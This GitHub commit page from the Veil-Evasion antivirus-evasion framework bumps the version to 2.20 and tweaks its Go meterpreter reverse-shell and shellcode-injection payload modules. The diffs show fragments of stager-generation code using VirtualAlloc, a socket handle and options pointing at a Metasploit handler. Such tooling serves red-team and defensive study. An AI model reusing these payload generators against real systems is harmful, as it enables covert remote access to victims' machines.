Skip to content
This repository has been archived by the owner on Jan 10, 2024. It is now read-only.

Commit

Permalink
Go Payloads have been slightly tweaked and are set for release.
Browse files Browse the repository at this point in the history
  • Loading branch information
ChrisTruncer committed May 19, 2015
1 parent e76ed40 commit 2b20a1d
Show file tree
Hide file tree
Showing 6 changed files with 13 additions and 6 deletions.
4 changes: 4 additions & 0 deletions CHANGELOG
Original file line number Diff line number Diff line change
@@ -1,3 +1,7 @@
[5.19.2015]
Released.: 2.20
Added....: This release includes Go payloads being added into the framework! Veil-Evasion can now compile any go payloads provided to it! Thanks to @b00stfr3ak for submitting them to us!

[4.27.2015]
Released.: 2.19.2
Fixed....: Fixed bug identified in Github Issue #138. Msfvenom options are now being properly added into the command each time.
Expand Down
2 changes: 1 addition & 1 deletion modules/common/messages.py
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@
import helpers


version = "2.19.2"
version = "2.20"


# try to find and import the settings.py config file
Expand Down
3 changes: 2 additions & 1 deletion modules/payloads/go/meterpreter/rev_http.py
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,8 @@ def __init__(self):

# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = { "LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"]}
"LPORT" : ["", "Port of the metasploit handler"],
"compile_to_exe" : ["Y", "Compile to an executable"]}
def generate(self):
memCommit = helpers.randomString()
memReserve = helpers.randomString()
Expand Down
3 changes: 2 additions & 1 deletion modules/payloads/go/meterpreter/rev_https.py
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,8 @@ def __init__(self):

# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = { "LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"]}
"LPORT" : ["", "Port of the metasploit handler"],
"compile_to_exe" : ["Y", "Compile to an executable"]}
def generate(self):
memCommit = helpers.randomString()
memReserve = helpers.randomString()
Expand Down
5 changes: 3 additions & 2 deletions modules/payloads/go/meterpreter/rev_tcp.py
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,8 @@ def __init__(self):

# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = { "LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"]}
"LPORT" : ["", "Port of the metasploit handler"],
"compile_to_exe" : ["Y", "Compile to an executable"]}
def generate(self):
memCommit = helpers.randomString()
memReserve = helpers.randomString()
Expand Down Expand Up @@ -85,7 +86,7 @@ def generate(self):
payloadCode += "for i := 0; i < int(%s); i++ {\n" %(qty)
payloadCode += "%s = append(%s, %s[i])\n}\n%s += %s\n}\n" %(sc2, sc2, sc, total, qty)
payloadCode += "%s, _ := %s(uintptr(%s + 5))\n" %(mem, virtualAlloc, scLength)
payloadCode += "%s := (*[800000]byte)(unsafe.Pointer(%s))\n" %(buffer, mem)
payloadCode += "%s := (*[900000]byte)(unsafe.Pointer(%s))\n" %(buffer, mem)
payloadCode += "%s := (uintptr)(unsafe.Pointer(%s))\n" %(handle, socket)
payloadCode += "%s[0] = 0xBF\n" %(buffer)
payloadCode += "%s[1] = byte(%s)\n" %(buffer, handle)
Expand Down
2 changes: 1 addition & 1 deletion modules/payloads/go/shellcode_inject/virtual.py
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,7 @@ def __init__(self):
self.extension = "go"
self.rating = "Normal"
self.description = "Go VirtualAlloc method for inline shellcode injection"
self.required_options = {"compile_to_exe" : ["N", "Compile to an executable"]}
self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"]}

self.shellcode = shellcode.Shellcode()

Expand Down

0 comments on commit 2b20a1d

Please sign in to comment.